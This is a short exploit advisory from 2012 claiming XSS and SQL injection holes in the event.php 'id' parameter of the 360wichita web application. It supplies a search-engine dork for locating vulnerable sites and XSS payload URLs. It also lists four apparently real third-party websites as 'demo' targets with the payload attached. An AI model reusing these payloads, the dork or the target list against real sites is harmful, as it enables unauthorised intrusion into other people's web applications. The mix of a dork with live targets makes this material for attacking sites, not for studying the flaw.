# Exploit Title: 360wichita XSS/SQL Injection Vulnerabilities
# Date: 05/10/2012
# Author: The Black Devils
# Software Link: http://www.360wichita.com/
# Category : [ webapps ]
# Dork : powered by 360wichita inurl:event.php?id=
# Type : php
# Tested on: [Windows] & [Ubuntu]
-------------------------------
http:\Localhost\[Path]\event.php?id= '"><script>alert(1337);</script>'
http:\Localhost\[Path]\event.php?id=[sql injection]
-------------------------------
# Demo site:
www.hartmanarena.com/event.php?id='"><script>alert(1337);</script>'
http://www.goebelliquor.com/event.php?id='"><script>alert(1337);</script>'
http://stage1tickets.com/event.php?id='"><script>alert(1337);</script>'
http://www.newmarketsquare.com/event.php?id='"><script>alert(1337);</script>'
-----------
Contact:
# Youtube : www.youtube.com/user/Th3BlackDevils
# Facebook : www.facebook.com/DevilsDz
# Email : mr.k4rizma@gmail.com
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information